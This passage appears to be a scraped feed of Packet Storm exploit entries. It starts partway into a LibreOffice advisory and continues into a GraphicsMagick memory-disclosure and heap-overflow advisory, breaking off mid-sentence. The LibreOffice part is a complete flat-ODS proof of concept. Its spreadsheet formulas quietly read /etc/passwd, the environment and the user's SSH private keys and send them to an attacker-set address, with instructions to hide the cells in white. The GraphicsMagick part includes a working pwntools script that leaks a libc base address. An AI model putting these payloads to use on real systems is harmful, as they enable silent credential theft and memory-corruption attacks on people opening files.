works). \n \n# Impact \n \nIt is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, support all modern versions of LibreOffice and may be embedded in almost all formats supporting by LO. \n \n \n \npoc.fods: \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n \n<office:document xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\" xmlns:style=\"urn:oasis:names:tc:opendocument:xmlns:style:1.0\" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\" xmlns:table=\"urn:oasis:names:tc:opendocument:xmlns:table:1.0\" xmlns:draw=\"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\" xmlns:fo=\"urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:meta=\"urn:oasis:names:tc:opendocument:xmlns:meta:1.0\" xmlns:number=\"urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0\" xmlns:presentation=\"urn:oasis:names:tc:opendocument:xmlns:presentation:1.0\" xmlns:svg=\"urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0\" xmlns:chart=\"urn:oasis:names:tc:opendocument:xmlns:chart:1.0\" xmlns:dr3d=\"urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0\" xmlns:math=\"http://www.w3.org/1998/Math/MathML\" xmlns:form=\"urn:oasis:names:tc:opendocument:xmlns:form:1.0\" xmlns:script=\"urn:oasis:names:tc:opendocument:xmlns:script:1.0\" xmlns:config=\"urn:oasis:names:tc:opendocument:xmlns:config:1.0\" xmlns:ooo=\"http://openoffice.org/2004/office\" xmlns:ooow=\"http://openoffice.org/2004/writer\" xmlns:oooc=\"http://openoffice.org/2004/calc\" xmlns:dom=\"http://www.w3.org/2001/xml-events\" xmlns:xforms=\"http://www.w3.org/2002/xforms\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:rpt=\"http://openoffice.org/2005/report\" xmlns:of=\"urn:oasis:names:tc:opendocument:xmlns:of:1.2\" xmlns:xhtml=\"http://www.w3.org/1999/xhtml\" xmlns:grddl=\"http://www.w3.org/2003/g/data-view#\" xmlns:tableooo=\"http://openoffice.org/2009/table\" xmlns:drawooo=\"http://openoffice.org/2010/draw\" xmlns:calcext=\"urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0\" xmlns:loext=\"urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0\" xmlns:field=\"urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0\" xmlns:formx=\"urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0\" xmlns:css3t=\"http://www.w3.org/TR/css3-text/\" office:version=\"1.2\" office:mimetype=\"application/vnd.oasis.opendocument.spreadsheet\"> \n<office:automatic-styles> \n<style:style style:name=\"co1\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"73.3pt\"/> \n</style:style> \n<style:style style:name=\"co2\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"75.66pt\"/> \n</style:style> \n<style:style style:name=\"co3\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"173.14pt\"/> \n</style:style> \n<style:style style:name=\"co4\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"64.01pt\"/> \n</style:style> \n<style:style style:name=\"co5\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"420.94pt\"/> \n</style:style> \n<style:style style:name=\"co6\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"105.19pt\"/> \n</style:style> \n<style:style style:name=\"ro1\" style:family=\"table-row\"> \n<style:table-row-properties style:row-height=\"12.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/> \n</style:style> \n<style:style style:name=\"ro2\" style:family=\"table-row\"> \n<style:table-row-properties style:row-height=\"126.74pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"false\"/> \n</style:style> \n<style:style style:name=\"ro3\" style:family=\"table-row\"> \n<style:table-row-properties style:row-height=\"135.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/> \n</style:style> \n<style:style style:name=\"ta1\" style:family=\"table\" style:master-page-name=\"Default\"> \n<style:table-properties table:display=\"true\" style:writing-mode=\"lr-tb\"/> \n</style:style> \n<style:style style:name=\"ce1\" style:family=\"table-cell\" style:parent-style-name=\"Default\" style:data-style-name=\"N0\"/> \n<style:style style:name=\"ce2\" style:family=\"table-cell\" style:parent-style-name=\"Default\"> \n<style:text-properties style:use-window-font-color=\"true\"/> \n</style:style> \n<style:style style:name=\"ce5\" style:family=\"table-cell\" style:parent-style-name=\"Default\"> \n<style:table-cell-properties fo:background-color=\"#f3715a\"/> \n</style:style> \n<style:page-layout style:name=\"pm1\"> \n<style:page-layout-properties style:writing-mode=\"lr-tb\"/> \n<style:header-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\"/> \n</style:header-style> \n<style:footer-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\"/> \n</style:footer-style> \n</style:page-layout> \n<style:page-layout style:name=\"pm2\"> \n<style:page-layout-properties style:writing-mode=\"lr-tb\"/> \n<style:header-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\"> \n<style:background-image/> \n</style:header-footer-properties> \n</style:header-style> \n<style:footer-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\"> \n<style:background-image/> \n</style:header-footer-properties> \n</style:footer-style> \n</style:page-layout> \n</office:automatic-styles> \n<office:body> \n<office:spreadsheet> \n<table:calculation-settings table:automatic-find-labels=\"false\" table:use-regular-expressions=\"false\" table:use-wildcards=\"true\"/> \n<table:table table:name=\"Sheet1\" table:style-name=\"ta1\"> \n<table:table-column table:style-name=\"co1\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co2\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co3\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co5\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co6\" table:default-cell-style-name=\"Default\"/> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"8\"/> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell table:number-columns-repeated=\"9\"/> \n</table:table-row> \n<table:table-row table:style-name=\"ro2\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>Current user:</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce1\" table:formula=\"of:=\"/home/\" & MID(COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")) + LEN(\"USER=\"); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"))-LEN(\"USER=\")) & \"/\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\":\"; [.F3]; [.E3])\" office:value-type=\"float\" office:value=\"689\" calcext:value-type=\"float\"> \n<text:p>689</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\"/home\"; [.F3]; FIND(\":x:1000:1000:\"; [.F3]))\" office:value-type=\"float\" office:value=\"676\" calcext:value-type=\"float\"> \n<text:p>676</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce2\" table:formula=\"of:=COM.MICROSOFT.WEBSERVICE(\"/etc/passwd\")\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell/> \n<table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"><text:p>(change this)</text:p><text:p>Address:</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>http://localhost:8080</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro3\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>List of private keys:</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce1\"/> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & \"/.ssh/config\"); \"~\"; [.C3])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>Send:</text:p> \n</table:table-cell> \n<table:table-cell/> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>0 (default path)</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.C3] & \"/.ssh/id_rsa\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"5\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C5]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"1\" calcext:value-type=\"float\"> \n<text:p>1</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F6])\" office:value-type=\"float\" office:value=\"132\" calcext:value-type=\"float\"> \n<text:p>132</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F6]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"109\" calcext:value-type=\"float\"> \n<text:p>109</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.F4])\" office:value-type=\"float\" office:value=\"96\" calcext:value-type=\"float\"> \n<text:p>96</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C6]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"2\" calcext:value-type=\"float\"> \n<text:p>2</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F7])\" office:value-type=\"float\" office:value=\"297\" calcext:value-type=\"float\"> \n<text:p>297</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F7]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"259\" calcext:value-type=\"float\"> \n<text:p>259</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F6];1))\" office:value-type=\"float\" office:value=\"246\" calcext:value-type=\"float\"> \n<text:p>246</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C7]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"3\" calcext:value-type=\"float\"> \n<text:p>3</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F8])\" office:value-type=\"float\" office:value=\"436\" calcext:value-type=\"float\"> \n<text:p>436</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F8]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"409\" calcext:value-type=\"float\"> \n<text:p>409</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F7];1))\" office:value-type=\"float\" office:value=\"396\" calcext:value-type=\"float\"> \n<text:p>396</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C8]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"4\" calcext:value-type=\"float\"> \n<text:p>4</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F9])\" office:value-type=\"float\" office:value=\"586\" calcext:value-type=\"float\"> \n<text:p>586</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F9]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"563\" calcext:value-type=\"float\"> \n<text:p>563</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F8];1))\" office:value-type=\"float\" office:value=\"550\" calcext:value-type=\"float\"> \n<text:p>550</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C9]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"5\" calcext:value-type=\"float\"> \n<text:p>5</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F10])\" office:value-type=\"float\" office:value=\"718\" calcext:value-type=\"float\"> \n<text:p>718</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F10]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"695\" calcext:value-type=\"float\"> \n<text:p>695</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F9];1))\" office:value-type=\"float\" office:value=\"682\" calcext:value-type=\"float\"> \n<text:p>682</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C10]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"6\" calcext:value-type=\"float\"> \n<text:p>6</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F11])\" office:value-type=\"float\" office:value=\"882\" calcext:value-type=\"float\"> \n<text:p>882</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F11]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"860\" calcext:value-type=\"float\"> \n<text:p>860</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F10];1))\" office:value-type=\"float\" office:value=\"847\" calcext:value-type=\"float\"> \n<text:p>847</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C11]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"7\" calcext:value-type=\"float\"> \n<text:p>7</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F12])\" office:value-type=\"float\" office:value=\"1267\" calcext:value-type=\"float\"> \n<text:p>1267</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F12]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1240\" calcext:value-type=\"float\"> \n<text:p>1240</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F11];1))\" office:value-type=\"float\" office:value=\"1227\" calcext:value-type=\"float\"> \n<text:p>1227</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C12]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"8\" calcext:value-type=\"float\"> \n<text:p>8</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F13])\" office:value-type=\"float\" office:value=\"1408\" calcext:value-type=\"float\"> \n<text:p>1408</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F13]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1383\" calcext:value-type=\"float\"> \n<text:p>1383</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F12];1))\" office:value-type=\"float\" office:value=\"1370\" calcext:value-type=\"float\"> \n<text:p>1370</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C13]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"9\" calcext:value-type=\"float\"> \n<text:p>9</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F14])\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F14]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F13];1))\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C14]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n</table:table> \n<table:named-expressions/> \n</office:spreadsheet> \n</office:body> \n</office:document> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146319/libreoffice-disclose.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-05T20:00:04", "bulletinFamily": "exploit", "description": "", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://packetstormsecurity.com/files/144878/GraphicsMagick-Memory-Disclosure-Heap-Overflow.html", "id": "PACKETSTORM:144878", "title": "GraphicsMagick Memory Disclosure / Heap Overflow", "type": "packetstorm", "sourceData": "`'''Vulnerabilities summary \nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick. \n \nGraphicsMagick is aThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeleras SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.a \n \nThe vulnerabilities found are: \n \nMemory Information Disclosure \nHeap Overflow \nCredit \nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program \n \nVendor response \nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18). \n \nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt \n \n \nVulnerabilities details \n \nMemory Information Disclosure \nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file. \n \nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image. \n \nThis vulnerability can be triggered with a specially crafted MIFF file. \n \nThe code which triggers the vulnerable code path is: \n \n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file, \n64 const MagickBool verbose) \n65 { \n... \n660 for (i=0; i < profile_length; ) \n661 { \n662 if (profile[i] != 0x1c) \n663 { \n664 i++; \n665 continue; \n666 } \n667 i++; /* skip file separator */ \n668 i++; /* skip record number */ \n... \n725 i++; \n726 (void) fprintf(file,\" %.1024s:\\n\",tag); \n727 length=profile[i++] << 8; \n728 length|=profile[i++]; \n729 text=MagickAllocateMemory(char *,length+1); \n730 if (text != (char *) NULL) \n731 { \n732 char \n733 **textlist; \n734 \n735 register unsigned long \n736 j; \n737 \n738 (void) strncpy(text,(char *) profile+i,length); \n739 text[length]='\\0'; \n740 textlist=StringToList(text); \n741 if (textlist != (char **) NULL) \n742 { \n743 for (j=0; textlist[j] != (char *) NULL; j++) \n744 { \n745 (void) fprintf(file,\" %s\\n\",textlist[j]); \n... \n752 i+=length; \n753 } \n \n \nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8 \n \nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked. \n \nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation. \n \n \ngefa$? x/2xg profile \n0x8be210: 0x08000a001c414141 0x00007ffff690fba8 \n \n \nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file. \n \n \n41 41 41 - padding \n1C - sentinel check in line 662 \n00 - padding \n0A - \"Priority\" tag \n08 00 - 8 in big endian, the length \n \n \nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc. \n \n \ngefa$? x/xw 0x00007ffff690fba8 \n0x7ffff690fba8 <main_arena+136>: 0x008cdc40 \ngefa$? vmmap libc \nStart End Offset Perm Path \n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 --- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r-- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw- \n/lib/x86_64-linux-gnu/libc-2.23.so \n \nNow we can calculate the offset to libc base a 0x3c4b98 \n \nProof of Concept \n \n$ python miff/readexploit.py \n[+] Starting local process a/usr/bin/gma: pid 20019 \n[+] Receiving all data: Done (1.27KB) \n[*] Process a/usr/bin/gma stopped with exit code 0 (pid 20019) \n[*] Main Arena Leak: 0x7f72948adb98 \n[*] libc Base: 0x7f72944e9000 \n \n#!/usr/bin/python \n# GraphicsMagick IPTC Profile libc Leak \n \nfrom pwn import * \n \ndirectory = \"DIR\" \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' + \n'e-iptc=', \n'\\n\\x0c\\n:\\x1a', \n'\\n\\x00', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"readexploit.miff\" \nlength = 8 \n \n#libc_main_arena_entry_offset = 0x3c4ba8 \nlibc_main_arena_entry_offset = 0x3c4b98 \n \ndef main(): \ndata = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\") \nheader = partitions[0] + str(length) + partitions[1] \npayload = header + directory + partitions[2] + data + partitions[3] \nfile(output, \"w\").write(payload) \n \np = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output]) \noutput_leak = p.recvall() \npriority_offset = output_leak.index(\"Priority:\") + 12 \nmontage_offset = output_leak.index(\"Montage:\") - 3 \nleak = output_leak[priority_offset:montage_offset] \nif \"0x00000000\" in leak: \nlog.info(\"Unlucky run. Value corrupted by StringToList\") \nexit() \nmain_arena_leak = u64(leak.ljust(8, \"\\x00\")) \nlog.info(\"Main Arena Leak: 0x%x\" % main_arena_leak) \nlibc_base = main_arena_leak - libc_main_arena_entry_offset \nlog.info(\"libc Base: 0x%x\" % libc_base) \n \nif __name__ == \"__main__\": \nmain() \n \n \nHeap Overflow \nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file. \n \nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name. \n \n844 /* \n845 Display 